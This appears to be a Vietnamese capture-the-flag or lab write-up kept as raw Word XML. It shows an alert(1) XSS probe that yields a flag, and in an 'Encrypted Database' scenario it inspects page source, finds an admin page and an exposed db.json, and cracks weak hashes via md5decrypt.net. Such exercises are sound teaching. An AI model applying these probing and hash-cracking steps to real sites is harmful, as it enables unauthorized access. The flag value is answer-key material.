        </w:rPr>
        <w:t>Đầu tiên ta sẽ vào trang để xem thì ta thấy được trang bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5DB27F"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4DA3EF8C" wp14:editId="2529A2C1">
            <wp:extent cx="4857750" cy="6305550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21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8"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4857750" cy="6305550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7895B017" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2191493C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Thử payload </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1) để xem có gì xảy ra không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB34568" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417A92FA"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4955983C" wp14:editId="73BE12A1">
            <wp:extent cx="5000625" cy="1466850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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000625" cy="1466850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="166565C0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Thì ta có được flag</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFD43ED"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5DDDACB6" wp14:editId="1C37B6A2">
            <wp:extent cx="4238625" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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4238625" cy="1390650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123B861" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">your flag </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>is:ciyypjz</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="026566EA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: thực hiện chặn các hàm không muốn cho thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0729D449" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC1AD9D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_heading=h.hf6i5c9ju5dh" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Encrypted Database</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="16" w:name="_heading=h.moi2y0iudpyg" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="16" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_11"/>
        <w:id w:val="-261529533"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="232E609B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Encrypted Database - data</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="453CD92C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện lấy thông tin và giải mã dựa trên các hàm băm yếu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A645609"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bookmarkStart w:id="17" w:name="_heading=h.1owqd9kddrj0" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="17" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_12"/>
        <w:id w:val="1217553980"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="06456413" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:numPr>
              <w:ilvl w:val="0"/>
              <w:numId w:val="5"/>
            </w:numPr>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Tài nguyên:</w:t>
          </w:r>
          <w:hyperlink r:id="rId31">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="212120"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="1155CC"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:t>https://md5decrypt.net/en/</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2F1CE759" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Truy cập mã nguồn trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E40EE3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta tiến hành truy cập trang web và Inspect để xem mã nguồn </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="021BCDDF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB5885A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723CD934" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23658379" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08717BDF" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A9D55C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026AD882" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58009B89" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A5BCC56" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBAC980" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED0E732" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F42761B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B9B6E9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AADEF7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="043866CD"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lastRenderedPageBreak/>
        <w:t>Figure 5: Hình ảnh 1 phần mã nguồn trang web</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="206629A3" wp14:editId="0A582251">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>66676</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4024313</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2581275" cy="271463"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="107" name="Rectangle 107"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="3321550" y="1665650"/>
                          <a:ext cx="2756700" cy="360300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="9525" cap="flat" cmpd="sng">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                          <a:round/>
                          <a:headEnd type="none" w="sm" len="sm"/>
                          <a:tailEnd type="none" w="sm" len="sm"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3FE93657" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRDefault="00CD6539">
                            <w:pPr>
                              <w:spacing w:after="0"/>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4024313</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2581275" cy="271463"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:wrapNone/>
                <wp:docPr id="107" name="image117.png"/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic>
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image117.png"/>
                        <pic:cNvPicPr preferRelativeResize="0"/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId32"/>
                        <a:srcRect/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2581275" cy="271463"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect"/>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="72293791" wp14:editId="3245B415">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="18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6114105" cy="3924300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="371A4D97" wp14:editId="071F6A08">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-72015</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="4699000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="1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6114105" cy="4699000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CC7B60" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong hình ảnh trên, ta thấy có 1 đoạn script duy nhất có source là đường dẫn trang web + admin/assets/app.js, ta tiến hành xem thử có domain url+/admin/ hay không thì phát hiện ra thêm 1 trang login admin nữa. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A5CE7D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Vẫn Inspect trang login admin ta thấy được thêm 1 đường dẫn secret-database/db.json và đây chính là đường dẫn dẫn đến </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68EF8F97" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49648047" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F99F744" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AFAC84" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7A225D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E851E88" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F10B97" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="015684F0" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F36A002" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA56F1B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA41FEB"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t>Figure 6: Hình ảnh 1 phần mã nguồn trang web login admin</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="5B337605" wp14:editId="604371BC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="4737100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="11430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6114105" cy="4737100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
